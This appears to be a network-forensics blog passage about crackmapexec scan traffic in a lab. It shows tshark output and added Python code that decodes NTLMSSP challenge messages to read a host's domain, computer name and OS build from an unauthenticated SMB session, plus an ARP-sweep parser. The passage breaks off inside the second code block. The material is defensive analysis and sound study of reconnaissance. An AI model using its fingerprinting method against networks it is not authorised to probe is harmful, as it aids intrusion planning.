Let's now take a look at the packets generated when crackmapexec is executed on our network.
Here is the tcpdump filter used to capture the traffic. The file given to "-w" changes from run to run, as each crackmapexec command gets its own pcap. The excluded ports are the lab's own infrastructure traffic (67 and 68 are DHCP), which would otherwise clutter the capture.
root@securitynik:~# tcpdump -nnvvi eth0 'not port (9997 or 8089 or 8191 or 8000 or 8065 or 68 or 67)' -w cme-scan.pcap
Now that we have the file named "cme-scan.pcap", let's perform our packet analysis on this.
As always, when running tshark (or wireshark) one of the first things we should do is look at the protocol statistics. We can achieve this as follows:
root@securitynik:~# tshark -n -r cme-scan.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:
eth frames:1570 bytes:72502
arp frames:1521 bytes:64188
ip frames:49 bytes:8314
tcp frames:48 bytes:8244
nbss frames:28 bytes:6940
smb frames:3 bytes:381
smb2 frames:25 bytes:6559
icmp frames:1 bytes:70
===================================================================
Let's look into the TCP traffic by first looking at the conversations:
root@securitynik:~# tshark -n -r cme-scan.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
| <- | | -> | | Total | Relative | Duration |
| Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |
10.0.0.100:34564 <-> 10.0.0.105:445 9 1598 10 1166 19 2764 10.223046000 10.5146
10.0.0.100:39670 <-> 10.0.0.3:445 6 1669 8 1030 14 2699 7.135418000 0.0369
10.0.0.100:50874 <-> 10.0.0.103:445 6 1677 8 1030 14 2707 7.174715000 0.0219
10.0.0.100:50838 <-> 10.0.0.2:445 0 0 1 74 1 74 7.135206000 0.0000
================================================================================
Interestingly, crackmapexec reported 3 hosts, yet above we see 4 conversations on port 445. The bottom one, to 10.0.0.2, is a single 74-byte frame in one direction with nothing coming back: a SYN that was never answered, so there is no SMB listener (or no host) at that address. Let's set it aside and concentrate on the top 3, each of which carries well over a thousand bytes in each direction.
To make this a bit easier on ourselves, let's leverage a tshark filter that only focuses on the first conversation, with source port 34564 and destination port 445.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(tcp.port == 34564) and (tcp.port == 445)"
388 10.223046 10.0.0.100 → 10.0.0.105 TCP 74 34564 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2851720854 TSecr=0 WS=128
391 10.223405 10.0.0.105 → 10.0.0.100 TCP 66 445 → 34564 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
392 10.223423 10.0.0.100 → 10.0.0.105 TCP 54 34564 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
395 10.224501 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
399 10.225553 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
400 10.225566 10.0.0.100 → 10.0.0.105 TCP 54 34564 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
420 10.231080 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
421 10.231694 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
444 10.238197 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
446 10.238929 10.0.0.105 → 10.0.0.100 SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
447 10.243642 10.0.0.100 → 10.0.0.105 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
448 10.244629 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
449 10.247201 10.0.0.100 → 10.0.0.105 SMB2 126 Session Logoff Request
450 10.247610 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response
452 10.279539 10.0.0.105 → 10.0.0.100 TCP 126 [TCP Retransmission] 445 → 34564 [PSH, ACK] Seq=945 Ack=595 Win=2101760 Len=72
453 10.279577 10.0.0.100 → 10.0.0.105 TCP 66 34564 → 445 [ACK] Seq=595 Ack=1017 Win=32512 Len=0 SLE=945 SRE=1017
1565 20.735709 10.0.0.100 → 10.0.0.105 TCP 54 34564 → 445 [FIN, ACK] Seq=595 Ack=1017 Win=32512 Len=0
1566 20.736058 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [ACK] Seq=1017 Ack=596 Win=2101760 Len=0
1567 20.737597 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [RST, ACK] Seq=1017 Ack=596 Win=0 Len=0
Now that we have the above, we have insight into what the communication looks like. The TCP 3-way handshake completes (frames 388-392). The client then sends an SMB1 Negotiate Protocol Request (frame 395) and the server answers with an SMB2 Negotiate Protocol Response (frame 399), which is how a client learns that the server speaks SMB2 or later; a second, SMB2-native negotiate follows (frames 420-421). Authentication is NTLMSSP carried inside Session Setup: NEGOTIATE (frame 444), CHALLENGE (frame 446) and AUTH with an empty user (frame 447, "User: \"), that is, a null or anonymous session, which the server accepts (frame 448, no error) before the client logs off. Note that the teardown is not entirely graceful: the client sends its FIN some ten seconds later (frame 1565), and the server ACKs it and then resets the connection (frame 1567) rather than sending a FIN of its own. Frame 452 is the server retransmitting its Logoff Response, which the client acknowledges with a selective ACK (SLE/SRE) in frame 453; a lost segment, nothing more.
Now if we look into the Session Setup Response that carries the NTLMSSP_CHALLENGE (Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE), frame 446, we should be able to see how crackmapexec determined the operating system, domain and computer name. Note that this response comes before authentication completes: the server hands it to anyone who sends an NTLMSSP_NEGOTIATE, credentials or not. Let's look at specific fields in that packet to bring some clarity to this. First, let's adjust our tshark filter to show only traffic coming back from port 445 on the 3 devices found. The !(icmp) clause is there because an ICMP error message that quotes a TCP header with source port 445 would otherwise match as well; there is exactly one ICMP frame in this capture. We will revisit the 1521 ARP frames from the protocol hierarchy shortly, but work with me for now.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(tcp.srcport == 445) && !(icmp)"
11 7.135744 10.0.0.3 → 10.0.0.100 TCP 66 445 → 39670 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
14 7.137411 10.0.0.3 → 10.0.0.100 SMB2 506 Negotiate Protocol Response
39 7.145265 10.0.0.3 → 10.0.0.100 SMB2 506 Negotiate Protocol Response
63 7.154134 10.0.0.3 → 10.0.0.100 SMB2 401 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
87 7.163947 10.0.0.3 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED
111 7.172290 10.0.0.3 → 10.0.0.100 TCP 60 445 → 39670 [RST, ACK] Seq=1328 Ack=579 Win=0 Len=0
122 7.174930 10.0.0.103 → 10.0.0.100 TCP 66 445 → 50874 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
125 7.182170 10.0.0.103 → 10.0.0.100 SMB2 506 Negotiate Protocol Response
128 7.185537 10.0.0.103 → 10.0.0.100 SMB2 506 Negotiate Protocol Response
130 7.189042 10.0.0.103 → 10.0.0.100 SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
132 7.194414 10.0.0.103 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED
134 7.196617 10.0.0.103 → 10.0.0.100 TCP 60 445 → 50874 [RST, ACK] Seq=1336 Ack=579 Win=0 Len=0
391 10.223405 10.0.0.105 → 10.0.0.100 TCP 66 445 → 34564 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
399 10.225553 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
421 10.231694 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
446 10.238929 10.0.0.105 → 10.0.0.100 SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
448 10.244629 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
450 10.247610 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response
452 10.279539 10.0.0.105 → 10.0.0.100 TCP 126 [TCP Retransmission] 445 → 34564 [PSH, ACK] Seq=945 Ack=595 Win=2101760 Len=72
1566 20.736058 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [ACK] Seq=1017 Ack=596 Win=2101760 Len=0
1567 20.737597 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [RST, ACK] Seq=1017 Ack=596 Win=0 Len=0
As we can see from above, we have response packets from the hosts at 10.0.0.3, 10.0.0.103 and 10.0.0.105. These match what crackmapexec found so far. Notice the difference in how the three treat the null session: 10.0.0.3 and 10.0.0.103 answer it with STATUS_ACCESS_DENIED (frames 87 and 132) and then reset the connection, while 10.0.0.105 accepts it (frame 448). Either way, every one of them handed out an NTLMSSP_CHALLENGE first, and that is where the host information comes from. Let's now look into the specific fields to show how crackmapexec learned the information it displayed. Before looking at the specific fields, let's take frame 446 and expand it to see all of its fields.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(frame.number == 446)" -T text -V
Frame 446: 409 bytes on wire (3272 bits), 409 bytes captured (3272 bits)
Encapsulation type: Ethernet (1)
Arrival Time: Apr 7, 2019 23:12:40.690090000 EDT
[Time shift for this packet: 0.000000000 seconds]
Epoch Time: 1554693160.690090000 seconds
[Time delta from previous captured frame: 0.000516000 seconds]
[Time delta from previous displayed frame: 0.000000000 seconds]
[Time since reference or first frame: 10.238929000 seconds]
Frame Number: 446
Frame Length: 409 bytes (3272 bits)
Capture Length: 409 bytes (3272 bits)
[Frame is marked: False]
[Frame is ignored: False]
[Protocols in frame: eth:ethertype:ip:tcp:nbss:smb2:gss-api:spnego:ntlmssp]
Ethernet II, Src: 08:00:27:d1:1c:e7, Dst: 08:00:27:ac:14:9c
Destination: 08:00:27:ac:14:9c
Address: 08:00:27:ac:14:9c
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Source: 08:00:27:d1:1c:e7
Address: 08:00:27:d1:1c:e7
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 10.0.0.105, Dst: 10.0.0.100
0100 .... = Version: 4
.... 0101 = Header Length: 20 bytes (5)
Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
0000 00.. = Differentiated Services Codepoint: Default (0)
.... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
Total Length: 395
Identification: 0x515e (20830)
Flags: 0x4000, Don't fragment
0... .... .... .... = Reserved bit: Not set
.1.. .... .... .... = Don't fragment: Set
..0. .... .... .... = More fragments: Not set
...0 0000 0000 0000 = Fragment offset: 0
Time to live: 128
Protocol: TCP (6)
Header checksum: 0x9342 [validation disabled]
[Header checksum status: Unverified]
Source: 10.0.0.105
Destination: 10.0.0.100
Transmission Control Protocol, Src Port: 445, Dst Port: 34564, Seq: 505, Ack: 342, Len: 355
Source Port: 445
Destination Port: 34564
[Stream index: 3]
[TCP Segment Len: 355]
Sequence number: 505 (relative sequence number)
[Next sequence number: 860 (relative sequence number)]
Acknowledgment number: 342 (relative ack number)
0101 .... = Header Length: 20 bytes (5)
Flags: 0x018 (PSH, ACK)
000. .... .... = Reserved: Not set
...0 .... .... = Nonce: Not set
.... 0... .... = Congestion Window Reduced (CWR): Not set
.... .0.. .... = ECN-Echo: Not set
.... ..0. .... = Urgent: Not set
.... ...1 .... = Acknowledgment: Set
.... .... 1... = Push: Set
.... .... .0.. = Reset: Not set
.... .... ..0. = Syn: Not set
.... .... ...0 = Fin: Not set
[TCP Flags: ·······AP···]
Window size value: 8211
[Calculated window size: 2102016]
[Window size scaling factor: 256]
Checksum: 0x10ec [unverified]
[Checksum Status: Unverified]
Urgent pointer: 0
[SEQ/ACK analysis]
[This is an ACK to the segment in frame: 444]
[The RTT to ACK the segment was: 0.000732000 seconds]
[iRTT: 0.000377000 seconds]
[Bytes in flight: 355]
[Bytes sent since last PSH flag: 355]
[Timestamps]
[Time since first frame in this TCP stream: 0.015883000 seconds]
[Time since previous frame in this TCP stream: 0.000732000 seconds]
TCP payload (355 bytes)
NetBIOS Session Service
Message Type: Session message (0x00)
Length: 351
SMB2 (Server Message Block Protocol version 2)
SMB2 Header
Server Component: SMB2
Header Length: 64
Credit Charge: 1
NT Status: STATUS_MORE_PROCESSING_REQUIRED (0xc0000016)
Command: Session Setup (1)
Credits granted: 1
Flags: 0x00000001, Response
.... .... .... .... .... .... .... ...1 = Response: This is a RESPONSE
.... .... .... .... .... .... .... ..0. = Async command: This is a SYNC command
.... .... .... .... .... .... .... .0.. = Chained: This pdu is NOT a chained command
.... .... .... .... .... .... .... 0... = Signing: This pdu is NOT signed
.... .... .... .... .... .... .000 .... = Priority: This pdu does NOT contain a PRIORITY1
...0 .... .... .... .... .... .... .... = DFS operation: This is a normal operation
..0. .... .... .... .... .... .... .... = Replay operation: This is NOT a replay operation
Chain Offset: 0x00000000
Message ID: Unknown (2)
Process Id: 0x00000000
Tree Id: 0x00000000
Session Id: 0x000048000000003d
Signature: 00000000000000000000000000000000
[Response to: 444]
[Time from request: 0.000732000 seconds]
Session Setup Response (0x01)
StructureSize: 0x0009
0000 0000 0000 100. = Fixed Part Length: 4
.... .... .... ...1 = Dynamic Part: True
Session Flags: 0x0000
.... .... .... ...0 = Guest: False
.... .... .... ..0. = Null: False
.... .... .... .0.. = Encrypt: False
Blob Offset: 0x00000048
Blob Length: 279
Security Blob: a18201133082010fa0030a0101a10c060a2b060104018237...
GSS-API Generic Security Service Application Program Interface
Simple Protected Negotiation
negTokenTarg
negResult: accept-incomplete (1)
supportedMech: 1.3.6.1.4.1.311.2.2.10 (NTLMSSP - Microsoft NTLM Security Support Provider)
responseToken: 4e544c4d53535000020000001600160038000000358289e2...
NTLM Secure Service Provider
NTLMSSP identifier: NTLMSSP
NTLM Message Type: NTLMSSP_CHALLENGE (0x00000002)
Target Name: SECURITYNIK
Length: 22
Maxlen: 22
Offset: 56
Negotiate Flags: 0xe2898235, Negotiate 56, Negotiate Key Exchange, Negotiate 128, Negotiate Version, Negotiate Target Info, Negotiate Extended Security, Target Type Domain, Negotiate Always Sign, Negotiate NTLM key, Negotiate Seal, Negotia
1... .... .... .... .... .... .... .... = Negotiate 56: Set
.1.. .... .... .... .... .... .... .... = Negotiate Key Exchange: Set
..1. .... .... .... .... .... .... .... = Negotiate 128: Set
...0 .... .... .... .... .... .... .... = Negotiate 0x10000000: Not set
.... 0... .... .... .... .... .... .... = Negotiate 0x08000000: Not set
.... .0.. .... .... .... .... .... .... = Negotiate 0x04000000: Not set
.... ..1. .... .... .... .... .... .... = Negotiate Version: Set
.... ...0 .... .... .... .... .... .... = Negotiate 0x01000000: Not set
.... .... 1... .... .... .... .... .... = Negotiate Target Info: Set
.... .... .0.. .... .... .... .... .... = Request Non-NT Session: Not set
.... .... ..0. .... .... .... .... .... = Negotiate 0x00200000: Not set
.... .... ...0 .... .... .... .... .... = Negotiate Identify: Not set
.... .... .... 1... .... .... .... .... = Negotiate Extended Security: Set
.... .... .... .0.. .... .... .... .... = Target Type Share: Not set
.... .... .... ..0. .... .... .... .... = Target Type Server: Not set
.... .... .... ...1 .... .... .... .... = Target Type Domain: Set
.... .... .... .... 1... .... .... .... = Negotiate Always Sign: Set
.... .... .... .... .0.. .... .... .... = Negotiate 0x00004000: Not set
.... .... .... .... ..0. .... .... .... = Negotiate OEM Workstation Supplied: Not set
.... .... .... .... ...0 .... .... .... = Negotiate OEM Domain Supplied: Not set
.... .... .... .... .... 0... .... .... = Negotiate Anonymous: Not set
.... .... .... .... .... .0.. .... .... = Negotiate NT Only: Not set
.... .... .... .... .... ..1. .... .... = Negotiate NTLM key: Set
.... .... .... .... .... ...0 .... .... = Negotiate 0x00000100: Not set
.... .... .... .... .... .... 0... .... = Negotiate Lan Manager Key: Not set
.... .... .... .... .... .... .0.. .... = Negotiate Datagram: Not set
.... .... .... .... .... .... ..1. .... = Negotiate Seal: Set
.... .... .... .... .... .... ...1 .... = Negotiate Sign: Set
.... .... .... .... .... .... .... 0... = Request 0x00000008: Not set
.... .... .... .... .... .... .... .1.. = Request Target: Set
.... .... .... .... .... .... .... ..0. = Negotiate OEM: Not set
.... .... .... .... .... .... .... ...1 = Negotiate UNICODE: Set
NTLM Server Challenge: 67f26f829961c6cf
Reserved: 0000000000000000
Target Info
Length: 168
Maxlen: 168
Offset: 78
Attribute: NetBIOS domain name: SECURITYNIK
Target Info Item Type: NetBIOS domain name (0x0002)
Target Info Item Length: 22
NetBIOS Domain Name: SECURITYNIK
Attribute: NetBIOS computer name: SECNIK-2K19
Target Info Item Type: NetBIOS computer name (0x0001)
Target Info Item Length: 22
NetBIOS Computer Name: SECNIK-2K19
Attribute: DNS domain name: securitynik.local
Target Info Item Type: DNS domain name (0x0004)
Target Info Item Length: 34
DNS Domain Name: securitynik.local
Attribute: DNS computer name: SECNIK-2K19.securitynik.local
Target Info Item Type: DNS computer name (0x0003)
Target Info Item Length: 58
DNS Computer Name: SECNIK-2K19.securitynik.local
Attribute: Timestamp
Target Info Item Type: Timestamp (0x0007)
Target Info Item Length: 8
Timestamp: Apr 7, 2019 23:12:40.658449900 EDT
Attribute: End of list
Target Info Item Type: End of list (0x0000)
Target Info Item Length: 0
Version 10.0 (Build 17763); NTLM Current Revision 15
Major Version: 10
Minor Version: 0
Build Number: 17763
NTLM Current Revision: 15
From above, we have broken out every field in this packet. As you can see, much of the information crackmapexec displayed is sitting in the NTLMSSP CHALLENGE: the Target Name and NetBIOS domain name (SECURITYNIK), the NetBIOS and DNS computer names (SECNIK-2K19 and SECNIK-2K19.securitynik.local), the DNS domain name (securitynik.local), the server's clock in the Timestamp attribute, and the Version structure (10.0, build 17763). All of it was returned to a client that had not authenticated. Let's now wrap this part up by extracting those fields and presenting them in a more user-friendly manner.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(ntlmssp.messagetype == 0x00000002)" -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e ntlmssp.identifier -e ntlmssp.challenge.target_name -e ntlmssp.challenge.target_info.nb_domain_name -e ntlmssp.version.major -e ntlmssp.version.build_number -E header=y
ip.src tcp.srcport ip.dst tcp.dstport ntlmssp.identifier ntlmssp.challenge.target_name ntlmssp.challenge.target_info.nb_domain_name ntlmssp.version.major ntlmssp.version.build_number
10.0.0.3 445 10.0.0.100 39670 NTLMSSP SECURITYNIK-SYS SECURITYNIK-SYS 10 17763
10.0.0.103 445 10.0.0.100 50874 NTLMSSP SECURITYNIK-WIN SECURITYNIK-WIN 10 16299
10.0.0.105 445 10.0.0.100 34564 NTLMSSP SECURITYNIK SECURITYNIK 10 17763
Obviously, you should now try to extract some of the other fields that I did not include, such as ntlmssp.challenge.target_info.nb_computer_name, ntlmssp.challenge.target_info.dns_computer_name and ntlmssp.challenge.target_info.dns_domain_name. Two things worth reading off the table above: build 17763 is the Windows 10 1809 / Windows Server 2019 release and 16299 is 1709, which is how crackmapexec gets to an OS version with no credentials; and for 10.0.0.3 and 10.0.0.103 the NetBIOS domain name is simply the computer name (SECURITYNIK-SYS, SECURITYNIK-WIN), which is what a standalone Windows host returns, whereas 10.0.0.105 reports the SECURITYNIK domain.
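To show what tshark is doing for us here, the following is an added example (my code, not the blog's and not crackmapexec's) that decodes an NTLMSSP CHALLENGE message by hand: the 56-byte fixed header, the Target Name, the Negotiate Flags, the 8-byte server challenge, the Version structure and the AV_PAIR list that carries the NetBIOS/DNS names and the timestamp. The sample message is constructed from the values tshark decoded for frame 446 above; its first bytes reproduce the responseToken hex shown in the dissection, and the TargetInfo length and offset (168 at 78) come out the same as well.

```python
"""Decode an NTLMSSP CHALLENGE (Type 2) message: the fields tshark showed for frame 446, by hand."""
import struct
from datetime import datetime, timedelta, timezone

SIGNATURE = b"NTLMSSP\x00"
CHALLENGE_TYPE = 2
WINDOWS_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)   # FILETIME counts 100 ns ticks from here

# AvId values of the TargetInfo AV_PAIR list (MS-NLMP 2.2.2.1); tshark labels them the same way
AV_IDS = {0: "end_of_list", 1: "nb_computer_name", 2: "nb_domain_name", 3: "dns_computer_name",
          4: "dns_domain_name", 5: "dns_tree_name", 6: "flags", 7: "timestamp",
          8: "single_host", 9: "target_name", 10: "channel_bindings"}
UTF16_AVS = {1, 2, 3, 4, 5, 9}

# NegotiateFlags bits (MS-NLMP 2.2.2.5) worth naming when reading a challenge off the wire
FLAGS = {0x00000001: "NEGOTIATE_UNICODE", 0x00000004: "REQUEST_TARGET", 0x00000010: "NEGOTIATE_SIGN",
         0x00000020: "NEGOTIATE_SEAL", 0x00000200: "NEGOTIATE_NTLM", 0x00008000: "NEGOTIATE_ALWAYS_SIGN",
         0x00010000: "TARGET_TYPE_DOMAIN", 0x00080000: "NEGOTIATE_EXTENDED_SESSIONSECURITY",
         0x00800000: "NEGOTIATE_TARGET_INFO", 0x02000000: "NEGOTIATE_VERSION",
         0x20000000: "NEGOTIATE_128", 0x40000000: "NEGOTIATE_KEY_EXCH", 0x80000000: "NEGOTIATE_56"}


def _fields(buf, off):
    """An NTLM 'Fields' triple: Len(2) MaxLen(2) BufferOffset(4), little endian; returns the bytes it points at."""
    length, _maxlen, offset = struct.unpack_from("<HHI", buf, off)
    return buf[offset:offset + length]


def filetime_to_datetime(ft):
    return WINDOWS_EPOCH + timedelta(microseconds=ft // 10)


def parse_challenge(msg):
    if msg[:8] != SIGNATURE:
        raise ValueError("missing NTLMSSP signature")
    msg_type, = struct.unpack_from("<I", msg, 8)
    if msg_type != CHALLENGE_TYPE:
        raise ValueError(f"expected CHALLENGE (2), got message type {msg_type}")
    flags, = struct.unpack_from("<I", msg, 20)
    out = {"target_name": _fields(msg, 12).decode("utf-16-le"),
           "flags": flags,
           "flag_names": [name for bit, name in sorted(FLAGS.items()) if flags & bit],
           "server_challenge": msg[24:32].hex(),   # the nonce the client's NTLM response is computed over
           "target_info": {},
           "version": None}
    if flags & 0x02000000:   # NEGOTIATE_VERSION: an 8-byte Version structure follows TargetInfoFields
        major, minor, build, _reserved, revision = struct.unpack_from("<BBH3sB", msg, 48)
        out["version"] = {"major": major, "minor": minor, "build": build, "ntlm_revision": revision}
    if flags & 0x00800000:   # NEGOTIATE_TARGET_INFO: walk the AV_PAIR list until AvId 0
        info, pos = _fields(msg, 40), 0
        while pos + 4 <= len(info):
            av_id, av_len = struct.unpack_from("<HH", info, pos)
            value = info[pos + 4:pos + 4 + av_len]
            pos += 4 + av_len
            if av_id == 0:
                break
            name = AV_IDS.get(av_id, f"av_{av_id}")
            if av_id in UTF16_AVS:
                out["target_info"][name] = value.decode("utf-16-le")
            elif av_id == 7:
                out["target_info"][name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
            else:
                out["target_info"][name] = value.hex()
    return out


def fingerprint(msg):
    """The host identity a CHALLENGE leaks, in the spirit of the tshark -T fields command above."""
    p = parse_challenge(msg)
    v = p["version"] or {}
    return (p["target_name"], p["target_info"].get("nb_domain_name"),
            p["target_info"].get("dns_computer_name"), v.get("major"), v.get("build"))


# ---- constructed sample: the values tshark decoded from frame 446, packed back into a message ----
def _utf16(s):
    return s.encode("utf-16-le")


def _filetime(dt):
    return ((dt - WINDOWS_EPOCH) // timedelta(microseconds=1)) * 10


def build_challenge(target_name, flags, challenge, av_pairs, version):
    """Packs a CHALLENGE with the fixed 56-byte header layout; only used to build the sample."""
    name = _utf16(target_name)
    info = b"".join(struct.pack("<HH", i, len(v)) + v for i, v in av_pairs) + struct.pack("<HH", 0, 0)
    return (SIGNATURE + struct.pack("<I", CHALLENGE_TYPE)
            + struct.pack("<HHI", len(name), len(name), 56)
            + struct.pack("<I", flags) + challenge + bytes(8)
            + struct.pack("<HHI", len(info), len(info), 56 + len(name))
            + struct.pack("<BBH3sB", *version) + name + info)


# Apr 7, 2019 23:12:40.6584499 EDT as tshark showed it, to microsecond precision, in UTC
FRAME_446_TIMESTAMP = datetime(2019, 4, 8, 3, 12, 40, 658449, tzinfo=timezone.utc)
FRAME_446_CHALLENGE = build_challenge(
    "SECURITYNIK", 0xE2898235, bytes.fromhex("67f26f829961c6cf"),
    [(2, _utf16("SECURITYNIK")), (1, _utf16("SECNIK-2K19")), (4, _utf16("securitynik.local")),
     (3, _utf16("SECNIK-2K19.securitynik.local")), (7, struct.pack("<Q", _filetime(FRAME_446_TIMESTAMP)))],
    (10, 0, 17763, bytes(3), 15))

if __name__ == "__main__":
    for key, value in parse_challenge(FRAME_446_CHALLENGE).items():
        print(f"{key}: {value}")
```

fingerprint() returns the same kind of columns the tshark -T fields command produced, straight from the raw message. The point to take away is that the CHALLENGE is sent before the server has seen any credential, which is why a null session is enough for crackmapexec to report domain, computer name and OS build; for detection, a Version structure and a TargetInfo block going out in answer to an anonymous Session Setup from a host that has no business talking SMB is exactly the exchange to log.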
Before we go, if we remember when we looked at the protocol hierarchy above, there were 1521 ARP frames. Let's see what we can gather from these.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(arp)" | wc --lines
1521
From above, it looks like we have 1521 ARP frames (ARP, not ICMP; the single ICMP frame is separate). Let's see what is really going on here. ARP opcode 1 is a request ("who has"), opcode 2 a reply. Since crackmapexec was given a range of addresses on the local subnet, the scanner's kernel has to resolve a MAC address for every target before it can send a single SYN, and an address that never answers gets asked again, so the expectation is a long run of requests from 10.0.0.100 walking through the subnet. To help us understand what is going on, let's once again pull the fields of interest out:
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(arp)" -T fields -e arp.src.hw_mac -e arp.src.proto_ipv4 -e arp.dst.proto_ipv4 -e arp.opcode -E header=y | more
arp.src.hw_mac arp.src.proto_ipv4 arp.dst.proto_ipv4 arp.opcode
08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103 10.0.0.102 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.1 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.4 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.5 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.6 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.7 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.8 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.9 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.10 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.49 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.50 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.51 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.52 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.53 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.54 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.55 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.56 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.57 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.58 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.59 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.11 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.12 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.13 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.14 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.15 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.16 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.17 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.18 1
08:00:27:ac:14:9c 10.0.0.100 10.0.0.21 1
.... <truncated for brevity> ....
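The output above shows two different things side by side: 10.0.0.103 asking five times for the same 10.0.0.102 (a neighbour that is not answering), and 10.0.0.100, the host running crackmapexec, asking for one address after another. The following is an added example (my code, not the blog's and not crackmapexec's) that tells the two apart in tshark field output; the sample rows are constructed to follow the pattern above, and the single ARP reply from an assumed MAC 08:00:27:00:00:04 for 10.0.0.4 is not on the page.

```python
"""Spot an ARP sweep in tshark '-T fields' output (added example; the sample rows are constructed)."""
from collections import defaultdict

# Constructed sample in the column order of the tshark command above, tab separated, including the
# header line that -E header=y prints: five repeated requests from 10.0.0.103 for 10.0.0.102, then
# 10.0.0.100 asking for one address after another, then a single reply (opcode 2) for contrast.
SWEEP_TARGETS = [1] + list(range(4, 19))           # 16 distinct addresses, as in the output above
SAMPLE_ARP_FIELDS = "arp.src.hw_mac\tarp.src.proto_ipv4\tarp.dst.proto_ipv4\tarp.opcode\n"
SAMPLE_ARP_FIELDS += "08:00:27:ec:69:d7\t10.0.0.103\t10.0.0.102\t1\n" * 5
SAMPLE_ARP_FIELDS += "".join(f"08:00:27:ac:14:9c\t10.0.0.100\t10.0.0.{i}\t1\n" for i in SWEEP_TARGETS)
SAMPLE_ARP_FIELDS += "08:00:27:00:00:04\t10.0.0.4\t10.0.0.100\t2\n"    # assumed reply, not on the page


def parse_arp_fields(text):
    """Rows of (src_mac, src_ip, dst_ip, opcode); skips the header and blank lines."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("arp.src.hw_mac"):
            continue
        mac, src_ip, dst_ip, opcode = line.split("\t")
        rows.append((mac, src_ip, dst_ip, int(opcode)))
    return rows


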